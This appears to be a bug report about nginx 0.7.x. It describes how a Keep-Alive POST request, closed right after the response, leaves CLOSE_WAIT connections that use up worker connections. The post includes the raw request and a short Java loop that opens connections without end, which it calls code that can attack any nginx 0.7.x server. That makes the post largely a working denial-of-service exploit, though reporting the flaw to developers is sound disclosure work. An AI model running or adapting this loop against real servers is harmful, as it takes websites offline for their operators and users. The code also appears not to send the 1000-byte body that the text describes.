I send the following request to nginx 0.7.x:
"POST / HTTP/1.0\r\nContent-Length: 1000\r\nConnection: Keep-Alive\r\n\r\n" + 1000 bytes
then close the connection immediately as soon as the response received. And there will be a CLOSE_WAIT connection in the server and will not disappear until the nginx process is killed.
So we can attack any nginx 0.7.x server in this way. Finally there will be a large number of CLOSE_WAIT connections in netstat and "nginx 1024 worker_connections is not enough" in the nginx error log.
There is no problem in nginx 0.6.x and 0.8.x.
Here is the code that can attack any nginx 0.7.x server, written in Java:
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
byte[] bb = new byte[1000];
while (true) {
Socket socket = new Socket("localhost", 80);
socket.getOutputStream().write(("POST / HTTP/1.0\r\nContent-Length: " + bb.length + "\r\nConnection: Keep-Alive\r\n\r\n").getBytes());
socket.getInputStream().read();
}
}
}